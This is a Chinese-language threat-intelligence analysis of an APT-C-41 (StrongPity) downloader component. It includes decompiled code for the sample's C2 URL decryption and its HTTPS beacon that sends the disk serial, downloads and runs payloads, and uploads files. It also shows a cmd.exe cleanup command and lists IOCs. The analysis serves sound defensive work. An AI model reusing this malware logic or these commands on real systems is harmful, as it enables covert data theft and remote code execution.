前言
APT-C-41(又被称为蓝色魔眼、Promethium、StrongPity),该APT组织最早的攻击活动可以追溯到2012年。该组织主要针对意大利、土耳其、比利时、叙利亚、欧洲等地区和国家进行攻击活动。本次捕获的样本是该组织常用的一个通用组件,主要功能是通过HTTPS协议回传数据(C盘序列号、sft文件)和下载载荷执行。个人将该组件定义为下载器,不过由于该组件也可以根据回传指令执行不同功能,定义为远控RAT也可以。
样本分析
Main函数主要功能如下:
1、创建互斥体("WURmHysJHqPPJlos")保证单实例运行
2、获取C盘序列号,分别解密出两个回连URL(C2:autoconfirmations[.]com)
3、创建进程执行%Temp%目录下的可执行程序(winmsism.exe、sppser.exe),以上两个程序由其它模块组件创建
1 int __cdecl main(int argc, const char **argv, const char **envp)
2 {
3 HMODULE v3; // eax
4 HWND (__stdcall *GetConsoleWindow)(); // ebx
5 HMODULE v5; // eax
6 BOOL (__stdcall *ShowWindow)(HWND, int); // esi
7 int v7; // eax
8 WCHAR Name[18]; // [esp+14h] [ebp-74h] BYREF
9 wchar_t Source[14]; // [esp+38h] [ebp-50h] BYREF
10 wchar_t v11[14]; // [esp+54h] [ebp-34h] BYREF
11 CPPEH_RECORD ms_exc; // [esp+70h] [ebp-18h]
12
13 Name[0] = 'W';
14 Name[1] = 'U';
15 Name[2] = 'R';
16 Name[3] = 'm';
17 Name[4] = 'H';
18 Name[5] = 'y';
19 Name[6] = 's';
20 Name[7] = 'J';
21 Name[8] = 'H';
22 Name[9] = 'q';
23 Name[10] = 'P';
24 Name[11] = 'P';
25 Name[12] = 'J';
26 Name[13] = 'l';
27 Name[14] = 'o';
28 Name[15] = 's';
29 Name[16] = 0;
30 v3 = GetModuleHandleA("Kernel32");
31 GetConsoleWindow = (HWND (__stdcall *)())GetProcAddress(v3, "GetConsoleWindow");
32 v5 = GetModuleHandleA("User32");
33 ShowWindow = (BOOL (__stdcall *)(HWND, int))GetProcAddress(v5, "ShowWindow");
34 v7 = ((int (__stdcall *)(_DWORD))GetConsoleWindow)(0);
35 ((void (__stdcall *)(int))ShowWindow)(v7);
36 CreateMutexW(0, 1, Name); // WURmHysJHqPPJlos
37 if ( GetLastError() != 0xB7 )
38 {
39 sub_401550(); // 获取C盘序列号、解密两个C2地址
40 Source[0] = '\\';
41 Source[1] = 'w';
42 Source[2] = 'i';
43 Source[3] = 'n';
44 Source[4] = 'm';
45 Source[5] = 's';
46 Source[6] = 'i';
47 Source[7] = 's';
48 Source[8] = 'm';
49 Source[9] = '.';
50 Source[10] = 'e';
51 Source[11] = 'x';
52 Source[12] = 'e';
53 Source[13] = 0;
54 v11[0] = '\\';
55 v11[1] = 's';
56 v11[2] = 'p';
57 v11[3] = 'p';
58 v11[4] = 's';
59 v11[5] = 'e';
60 v11[6] = 'r';
61 v11[7] = '.';
62 v11[8] = 'e';
63 v11[9] = 'x';
64 v11[10] = 'e';
65 v11[11] = 0;
66 sub_4024C4(Source); // 创建进程:winmsism.exe
67 Sleep(1500u);
68 sub_4024C4(v11); // 创建进程:sppser.exe
69 Sleep(4500u);
70 while ( 1 )
71 {
72 ms_exc.registration.TryLevel = 0;
73 sub_4013CB(); // 循环执行:主功能函数
74 Sleep(15000u);
75 ms_exc.registration.TryLevel = -2;
76 }
77 }
78 return 0;
79 }
获取C盘序列号,异或解密回连URL地址:
https://autoconfirmations[.]com/parse_ini_file.php
https://autoconfirmations[.]com/phpinfo.php
1 int sub_401550()
2 {
3 unsigned int i; // esi
4 HMODULE v1; // eax
5 BOOL (__stdcall *GetVolumeInformationW)(LPCWSTR, LPWSTR, DWORD, LPDWORD, LPDWORD, LPDWORD, LPWSTR, DWORD); // eax
6 unsigned int v3; // eax
7 int v5; // [esp+4h] [ebp-FCh] BYREF
8 char v6[16]; // [esp+8h] [ebp-F8h] BYREF
9 __int16 v7; // [esp+18h] [ebp-E8h]
10 __int16 v8; // [esp+1Ah] [ebp-E6h]
11 __int16 v9; // [esp+1Ch] [ebp-E4h]
12 __int16 v10; // [esp+1Eh] [ebp-E2h]
13 __int16 v11; // [esp+20h] [ebp-E0h]
14 __int16 v12; // [esp+22h] [ebp-DEh]
15 __int16 v13; // [esp+24h] [ebp-DCh]
16 __int16 v14; // [esp+26h] [ebp-DAh]
17 __int16 v15; // [esp+28h] [ebp-D8h]
18 __int16 v16; // [esp+2Ah] [ebp-D6h]
19 __int16 v17; // [esp+2Ch] [ebp-D4h]
20 __int16 v18; // [esp+2Eh] [ebp-D2h]
21 __int16 v19; // [esp+30h] [ebp-D0h]
22 __int16 v20; // [esp+32h] [ebp-CEh]
23 __int16 v21; // [esp+34h] [ebp-CCh]
24 __int16 v22; // [esp+36h] [ebp-CAh]
25 __int16 v23; // [esp+38h] [ebp-C8h]
26 __int16 v24; // [esp+3Ah] [ebp-C6h]
27 __int16 v25; // [esp+3Ch] [ebp-C4h]
28 __int16 v26; // [esp+3Eh] [ebp-C2h]
29 __int16 v27; // [esp+40h] [ebp-C0h]
30 __int16 v28; // [esp+42h] [ebp-BEh]
31 __int16 v29; // [esp+44h] [ebp-BCh]
32 __int16 v30; // [esp+46h] [ebp-BAh]
33 __int16 v31; // [esp+48h] [ebp-B8h]
34 __int16 v32; // [esp+4Ah] [ebp-B6h]
35 __int16 v33; // [esp+4Ch] [ebp-B4h]
36 __int16 v34; // [esp+4Eh] [ebp-B2h]
37 __int16 v35; // [esp+50h] [ebp-B0h]
38 __int16 v36; // [esp+52h] [ebp-AEh]
39 __int16 v37; // [esp+54h] [ebp-ACh]
40 __int16 v38; // [esp+56h] [ebp-AAh]
41 __int16 v39; // [esp+58h] [ebp-A8h]
42 __int16 v40; // [esp+5Ah] [ebp-A6h]
43 __int16 v41; // [esp+5Ch] [ebp-A4h]
44 __int16 v42; // [esp+5Eh] [ebp-A2h]
45 __int16 v43; // [esp+60h] [ebp-A0h]
46 __int16 v44; // [esp+62h] [ebp-9Eh]
47 __int16 v45; // [esp+64h] [ebp-9Ch]
48 __int16 v46; // [esp+66h] [ebp-9Ah]
49 __int16 v47; // [esp+68h] [ebp-98h]
50 _WORD v48[42]; // [esp+6Ch] [ebp-94h] BYREF
51 char ArgList[2]; // [esp+C0h] [ebp-40h] BYREF
52 __int16 v50; // [esp+C2h] [ebp-3Eh]
53 __int16 v51; // [esp+C4h] [ebp-3Ch]
54 __int16 v52; // [esp+C6h] [ebp-3Ah]
55 __int16 v53; // [esp+C8h] [ebp-38h]
56 __int16 v54; // [esp+CAh] [ebp-36h]
57 __int16 v55; // [esp+CCh] [ebp-34h]
58 __int16 v56; // [esp+CEh] [ebp-32h]
59 __int16 v57; // [esp+D0h] [ebp-30h]
60 __int16 v58; // [esp+D2h] [ebp-2Eh]
61 __int16 v59; // [esp+D4h] [ebp-2Ch]
62 wchar_t Source[12]; // [esp+D8h] [ebp-28h] BYREF
63 __int16 v61[6]; // [esp+F0h] [ebp-10h] BYREF
64
65 i = 0;
66 v5 = 0;
67 if ( !GetTempPathW(0x104u, g_Source) )
68 {
69 _loaddll(0);
70 __debugbreak();
71 }
72 Source[1] = 'e'; // keymgrdata
73 Source[2] = 'y';
74 Source[3] = 'm';
75 Source[4] = 'g';
76 Source[5] = 'r';
77 Source[6] = 'd';
78 Source[7] = 'a';
79 Source[9] = 'a';
80 Source[10] = 0;
81 Source[0] = 'k';
82 Source[8] = 't';
83 wcscat_s(g_Source, 0x104u, Source); // %Temp%\keymgrdata
84 v61[0] = 'C';
85 v61[1] = ':';
86 v61[2] = '\\';
87 v61[3] = '\\';
88 v61[4] = 0;
89 v1 = GetModuleHandleA("Kernel32");
90 GetVolumeInformationW = (BOOL (__stdcall *)(LPCWSTR, LPWSTR, DWORD, LPDWORD, LPDWORD, LPDWORD, LPWSTR, DWORD))GetProcAddress(v1, "GetVolumeInformationW");
91 GetVolumeInformationW((LPCWSTR)v61, 0, 0, (LPDWORD)&v5, 0, 0, 0, 0);// 获取C盘序列号
92 strcpy(ArgList, "v");
93 v51 = '6';
94 v50 = '2';
95 v52 = '_';
96 v53 = 'k';
97 v54 = 't';
98 v55 = '2';
99 v57 = 'p';
100 v59 = 0;
101 v56 = '0';
102 v58 = '0';
103 mySprintf(Buffer, (char *)L"%ls_%u", (char)ArgList);
104 strcpy(v6, "8");
105 strcpy(&v6[6], " ");
106 strcpy(&v6[8], "#");
107 strcpy(&v6[10], "j");
108 *(_WORD *)&v6[12] = 0x7F;
109 *(_WORD *)&v6[14] = 0x7F;
110 v8 = '%';
111 v11 = '3';
112 v13 = '>';
113 v14 = '6';
114 v15 = '9';
115 strcpy(&v6[2], "$");
116 strcpy(&v6[4], "$");
117 v9 = '$';
118 v19 = '$';
119 v20 = '9';
120 v22 = '>';
121 v23 = '#';
122 v7 = '1';
123 v10 = '?';
124 v12 = '?';
125 v16 = '"';
126 v17 = '=';
127 v18 = '1';
128 v21 = '?';
129 v24 = '~';
130 v27 = '=';
131 v28 = '\x7F';
132 v26 = '?';
133 v30 = '1';
134 v32 = '#';
135 v31 = '"';
136 v25 = '3';
137 v34 = '\x0F';
138 v38 = '\x0F';
139 v39 = '6';
140 v36 = '>';
141 v41 = '<';
142 v45 = '8';
143 v3 = 0;
144 v35 = '9';
145 v37 = '9';
146 v40 = '9';
147 v29 = ' ';
148 v33 = '5';
149 v42 = '5';
150 v43 = '~';
151 v44 = ' ';
152 v46 = ' ';
153 v47 = 0;
154 do
155 {
156 *(__m128i *)&v6[2 * v3] = _mm_xor_si128((__m128i)xmmword_415570, *(__m128i *)&v6[2 * v3]);// 解密C2:https://autoconfirmations.com/parse_ini_file.php
157 v3 += 8;
158 }
159 while ( v3 < 0x30 );
160 mySprintf(g_C2, (char *)L"%ls", (char)v6);
161 strcpy((char *)v48, "5");
162 v48[5] = 103;
163 v48[6] = 114;
164 v48[7] = 114;
165 v48[8] = 60;
166 v48[9] = 40;
167 strcpy((char *)&v48[1], ")");
168 v48[2] = 41;
169 v48[10] = 41;
170 v48[3] = 45;
171 v48[11] = 50;
172 v48[13] = 50;
173 v48[12] = 62;
174 v48[17] = 47;
175 v48[18] = 48;
176 v48[19] = 60;
177 v48[20] = 41;
178 v48[22] = 50;
179 v48[4] = 46;
180 v48[24] = 46;
181 v48[26] = 62;
182 v48[14] = 51;
183 v48[23] = 51;
184 v48[15] = 59;
185 v48[16] = 52;
186 v48[21] = 52;
187 v48[25] = 115;
188 v48[27] = 50;
189 v48[28] = 48;
190 v48[29] = 114;
191 v48[33] = 52;
192 v48[31] = 53;
193 v48[37] = 115;
194 v48[39] = 53;
195 v48[41] = 0;
196 v48[35] = 59;
197 v48[30] = 45;
198 v48[32] = 45;
199 v48[38] = 45;
200 v48[40] = 45;
201 v48[34] = 51;
202 v48[36] = 50;
203 do
204 v48[i++] ^= 0x5Du; // 解密:https://autoconfirmations.com/phpinfo.php
205 while ( i < 0x29 );
206 return mySprintf(g_C2_, (char *)L"%ls", (char)v48);
207 }
创建进程执行%Temp%目录下的可执行文件:
%Temp%\keymgrdata\winmsism.exe
%Temp%\keymgrdata\sppser.exe
1 wchar_t *__cdecl sub_4024C4(wchar_t *Source)
2 {
3 int v1; // edi
4 wchar_t *result; // eax
5 wchar_t Destination[260]; // [esp+Ch] [ebp-20Ch] BYREF
6
7 v1 = 520;
8 memset(Destination, 0, sizeof(Destination));
9 wcscat_s(Destination, 0x104u, g_Source); // %Temp%\keymgrdata
10 wcscat_s(Destination, 0x104u, Source); // %Temp%\keymgrdata\winmsism.exe
11 // %Temp%\keymgrdata\sppser.exe
12 myCreateProcess(Destination); // 创建进程执行
13 result = Destination;
14 do
15 {
16 *(_BYTE *)result = 0;
17 result = (wchar_t *)((char *)result + 1);
18 --v1;
19 }
20 while ( v1 );
21 return result;
22 }
主函数功能如下:
1、回连C2服务器,根据返回结果执行不同指令(指令1:0x21222324、指令2:0xDEEFDAAD)
2、遍历回传.sft文件(.sft文件同样由其它模块组件创建)
1 int sub_4013CB()
2 {
3 int v0; // edi
4 char *newBuff1; // esi
5 int v2; // ecx
6 char *newBuff1_; // eax
7 int v4; // ebx
8 LPVOID v5; // edx
9 _BYTE *v6; // eax
10 int i; // ecx
11 HANDLE v8; // eax
12 int v9; // ecx
13 char *v10; // eax
14 int v11; // ecx
15 int *v12; // eax
16 char *v13; // eax
17 void *dwMilliseconds; // [esp+0h] [ebp-60h]
18 LPVOID lpMem; // [esp+10h] [ebp-50h] BYREF
19 int v17; // [esp+14h] [ebp-4Ch]
20 int v18[2]; // [esp+18h] [ebp-48h] BYREF
21 int v19; // [esp+20h] [ebp-40h]
22 char *v20; // [esp+24h] [ebp-3Ch]
23 unsigned int v21; // [esp+28h] [ebp-38h]
24 char v22[20]; // [esp+3Ch] [ebp-24h] BYREF
25 char v23[12]; // [esp+50h] [ebp-10h] BYREF
26
27 v0 = 260;
28 lpMem = 0;
29 v17 = 0;
30 newBuff1 = (char *)myNew(260);
31 sub_40152F(v18);
32 strcpy(v23, "name=%ls");
33 v2 = 260;
34 newBuff1_ = newBuff1;
35 do
36 {
37 *newBuff1_++ = 0;
38 --v2;
39 }
40 while ( v2 );
41 sub_4024A8(newBuff1, v23, Buffer); // 格式化字符串,并将格式化后的数据转换成ASCII码十六进制形式
42 v18[0] = (int)g_C2; // https://autoconfirmations.com/parse_ini_file.php
43 v20 = newBuff1;
44 v19 |= 0x30u;
45 v21 = strlen(newBuff1);
46 v4 = sub_401000(v18, &lpMem); // 回连C2服务器
47 if ( lpMem )
48 {
49 sub_401DCF(&lpMem); // 根据C2返回结果,执行不同指令
50 v5 = lpMem;
51 v6 = lpMem;
52 for ( i = v17; i; --i )
53 *v6++ = 0;
54 dwMilliseconds = v5;
55 v8 = GetProcessHeap();
56 HeapFree(v8, 0, dwMilliseconds);
57 }
58 if ( v4 )
59 {
60 v9 = 260;
61 v10 = newBuff1;
62 do
63 {
64 *v10++ = 0;
65 --v9;
66 }
67 while ( v9 );
68 strcpy(v22, "name=%ls&delete=ok");
69 sub_4024A8(newBuff1, v22, Buffer);
70 v20 = newBuff1;
71 v21 = strlen(newBuff1);
72 sub_401000(v18, 0); // 回连C2服务器
73 }
74 v11 = 36;
75 v12 = v18;
76 do
77 {
78 *(_BYTE *)v12 = 0;
79 v12 = (int *)((char *)v12 + 1);
80 --v11;
81 }
82 while ( v11 );
83 v13 = newBuff1;
84 do
85 {
86 *v13++ = 0;
87 --v0;
88 }
89 while ( v0 );
90 j_j_j___free_base(newBuff1);
91 Sleep(10000u);
92 return sub_401AAF(); // 遍历回传.sft文件
93 }
回连C2服务器:https://autoconfirmations[.]com/parse_ini_file.php
发送当前软件版本与C盘序列号:"name=v26_kt20p0_3000XXXXXX"
软件版本:"v26_kt20p0"
C盘序列号:"3000XXXXXX"
1 void *__cdecl sub_4022A3(HINTERNET hConnect, LPCWSTR pwszObjectName, int a3, int a4)
2 {
3 const WCHAR *v4; // eax
4 void *v5; // esi
5 const WCHAR *v6; // ebx
6 DWORD v8; // [esp-8h] [ebp-20h]
7 int v9; // [esp+Ch] [ebp-Ch] BYREF
8 int Buffer; // [esp+10h] [ebp-8h] BYREF
9
10 Buffer = a4 & 0x40;
11 v9 = a4;
12 v4 = L"POST";
13 if ( (a4 & 0x20) == 0 )
14 v4 = L"GET";
15 v5 = WinHttpOpenRequest(hConnect, v4, pwszObjectName, 0, 0, 0, Buffer != 0 ? 0x800000 : 0);// 返回HTTP请求句柄(post:parse_ini_file.php)
16 if ( v5 )
17 {
18 v6 = 0;
19 if ( !*(_DWORD *)(a3 + 20) )
20 {
21 v6 = L"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nConnection: close\r\n";
22 if ( (v9 & 0x30) != 0 )
23 v6 = L"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n";
24 WinHttpAddRequestHeaders(v5, v6, 0xFFFFFFFF, 0x20000000u);
25 }
26 if ( *(_DWORD *)(a3 + 24) )
27 WinHttpAddRequestHeaders(v5, *(LPCWSTR *)(a3 + 24), 0xFFFFFFFF, 0xA0000000);
28 if ( *(_DWORD *)(a3 + 28) )
29 WinHttpAddRequestHeaders(v5, *(LPCWSTR *)(a3 + 28), 0xFFFFFFFF, 0xA0000000);
30 if ( Buffer )
31 {
32 Buffer = 0x3300;
33 WinHttpSetOption(v5, 0x1Fu, &Buffer, 4u);
34 }
35 if ( WinHttpSendRequest(v5, v6, 0xFFFFFFFF, 0, 0, *(_DWORD *)(a3 + 16), 0) )// 发送HTTP请求
36 {
37 Buffer = 4;
38 v8 = *(_DWORD *)(a3 + 16);
39 v9 = 0;
40 if ( WinHttpWriteData(v5, *(LPCVOID *)(a3 + 12), v8, 0) )// 发送HTTP数据:
41 // 第一次:"name=v26_kt20p0_3000XXXXXX"
42 // 第二次:"name=v26_kt20p0_3000XXXXXX&delete=ok"
43 {
44 if ( WinHttpReceiveResponse(v5, 0)
45 && WinHttpQueryHeaders(v5, 0x20000013u, 0, &v9, (LPDWORD)&Buffer, 0)
46 && v9 == 200 )
47 {
48 return v5; // 如果数据发送成功,返回HTTP句柄
49 }
50 }
51 }
52 WinHttpCloseHandle(v5);
53 }
54 return 0;
55 }
如果C2返回数据:则数据的前4字节为指令ID,程序会根据不同的指令执行不同操作:
指令1:解密返回数据,保存到本地(%Temp\keymgrdata%)然后创建进程执行
指令2:清理作案环境,删除(%Temp\keymgrdata%)目录及其文件,然后结束进程
(cmd.exe /C ping 2.7.6.5 -n 3 -w 4444 & rmdir /Q /S "C:\Users\admin\AppData\Local\Temp\keymgrdata")
1 char *__cdecl sub_401DCF(int **a1)
2 {
3 int *v1; // edi
4 int v2; // eax
5 _WORD *v3; // edi
6 __int16 v4; // ax
7 _WORD *v5; // edi
8 __int16 v6; // ax
9 wchar_t *v7; // edx
10 unsigned int v9; // edx
11 _WORD *v10; // edi
12 __int16 v11; // ax
13 char *v12; // edi
14 __int16 v13; // ax
15 int v14; // esi
16 int v15; // ecx
17 WCHAR *v16; // eax
18 char *result; // eax
19 _BYTE *v18; // ecx
20 unsigned int v19; // esi
21 unsigned int i; // eax
22 unsigned int j; // edx
23 unsigned int k; // edx
24 unsigned int v23; // eax
25 WCHAR *v24; // eax
26 int v25; // ecx
27 int v26; // ecx
28 char *v27; // eax
29 int v28; // eax
30 _DWORD *v29; // ecx
31 HANDLE v30; // ecx
32 HANDLE hObject; // [esp+10h] [ebp-88Ch]
33 unsigned int v32; // [esp+18h] [ebp-884h]
34 _DWORD *v33; // [esp+1Ch] [ebp-880h]
35 struct _PROCESS_INFORMATION ProcessInformation; // [esp+20h] [ebp-87Ch] BYREF
36 struct _STARTUPINFOW StartupInfo; // [esp+30h] [ebp-86Ch] BYREF
37 DWORD NumberOfBytesWritten; // [esp+74h] [ebp-828h] BYREF
38 WCHAR CommandLine[512]; // [esp+78h] [ebp-824h] BYREF
39 char Buffer[520]; // [esp+478h] [ebp-424h] BYREF
40 WCHAR FileName[268]; // [esp+680h] [ebp-21Ch] BYREF
41 int v40; // [esp+898h] [ebp-4h]
42
43 v40 = 0;
44 v1 = *a1;
45 v2 = **a1;
46 if ( v2 == 0x21222324 ) // 指令1:解密服务器返回数据并执行
47 {
48 v18 = v1 + 4;
49 v33 = v1 + 4;
50 v19 = (unsigned int)v1[3] >> 2;
51 for ( i = v1[3] & 3; v19; --v19 )
52 {
53 for ( j = 0; j < 4; ++j )
54 *v18++ ^= *((_BYTE *)v1 + j + 4);
55 }
56 for ( k = 0; k < i; ++k )
57 *v18++ ^= *((_BYTE *)v1 + k + 4);
58 v23 = 0;
59 v14 = 520;
60 while ( 1 )
61 {
62 v32 = v23;
63 if ( v23 >= v1[2] ) // v1[2] == [buff+8]
64 goto LABEL_15;
65 NumberOfBytesWritten = 0;
66 v24 = FileName;
67 v25 = 520;
68 do
69 {
70 *(_BYTE *)v24 = 0;
71 v24 = (WCHAR *)((char *)v24 + 1);
72 --v25;
73 }
74 while ( v25 );
75 v26 = 520;
76 v27 = Buffer;
77 do
78 {
79 *v27++ = 0;
80 --v26;
81 }
82 while ( v26 );
83 mySprintf(Buffer, (char *)L"%ls", g_Source);
84 mySprintf((char *)FileName, (char *)L"%ls\\%hs", Buffer, v33);
85 v28 = sub_4023F1(0, (char *)v33 + 41, *(_DWORD *)((char *)v33 + 37));
86 v29 = v33;
87 if ( v28 == *(_DWORD *)((char *)v33 + 33) )
88 {
89 v30 = CreateFileW(FileName, 0xC0000000, 1u, 0, 2u, 0x80u, 0);
90 hObject = v30;
91 if ( v30 != (HANDLE)-1 )
92 {
93 WriteFile(v30, (char *)v33 + 41, *(_DWORD *)((char *)v33 + 37), &NumberOfBytesWritten, 0);
94 CloseHandle(hObject);
95 v29 = v33;
96 if ( !*((_BYTE *)v33 + 32) )
97 goto LABEL_37;
98 myCreateProcess(FileName);
99 }
100 v29 = v33;
101 }
102 LABEL_37:
103 v33 = (_DWORD *)((char *)v29 + *(_DWORD *)((char *)v29 + 37) + 41);
104 v23 = v32 + 1;
105 }
106 }
107 if ( v2 == 0xDEEFDAAD ) // 指令2:清理作案环境
108 {
109 memset(CommandLine, 0, sizeof(CommandLine));
110 memset(&StartupInfo, 0, sizeof(StartupInfo));
111 v3 = (_WORD *)&NumberOfBytesWritten + 1;
112 ProcessInformation = 0i64;
113 do
114 {
115 v4 = v3[1];
116 ++v3;
117 }
118 while ( v4 );
119 qmemcpy(v3, L"cmd.exe /C ping 2.7.6.5 -n 3 ", 0x3Cu);
120 v5 = (_WORD *)&NumberOfBytesWritten + 1;
121 do
122 {
123 v6 = v5[1];
124 ++v5;
125 }
126 while ( v6 );
127 v7 = g_Source;
128 qmemcpy(v5, L"-w 4444 & rmdir /Q /S \"", 0x30u);
129 while ( *v7++ )
130 ;
131 v9 = (char *)v7 - (char *)g_Source;
132 v10 = (_WORD *)&NumberOfBytesWritten + 1;
133 do
134 {
135 v11 = v10[1];
136 ++v10;
137 }
138 while ( v11 );
139 qmemcpy(v10, g_Source, v9);
140 v12 = (char *)&NumberOfBytesWritten + 2;
141 do
142 {
143 v13 = *((_WORD *)v12 + 1);
144 v12 += 2;
145 }
146 while ( v13 );
147 *(_DWORD *)v12 = 34;
148 CreateProcessW(0, CommandLine, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);
149 CloseHandle(ProcessInformation.hThread);
150 CloseHandle(ProcessInformation.hProcess);
151 _loaddll(0); // 结束进程
152 }
153 v14 = 520;
154 LABEL_15:
155 v15 = 520;
156 v16 = FileName;
157 do
158 {
159 *(_BYTE *)v16 = 0;
160 v16 = (WCHAR *)((char *)v16 + 1);
161 --v15;
162 }
163 while ( v15 );
164 result = Buffer;
165 do
166 {
167 *result++ = 0;
168 --v14;
169 }
170 while ( v14 );
171 return result;
172 }
如果C2没有返回数据:则发送如下数据到服务器:"name=v26_kt20p0_3000XXXXXX&delete=ok"
回连C2服务器:https://autoconfirmations[.]com/parse_ini_file.php
发送(%Temp\keymgrdata%)目录下的所有 .sft 隐藏文件:
发送数据如下所示:
发送成功后删除 .sft 文件:
IOCS
08ecc9b5acdfc237d067a73a1cd7c88a
192.36.27.20
autoconfirmations.com
https://autoconfirmations[.]com/phpinfo.php
https://autoconfirmations[.]com/parse_ini_file.php
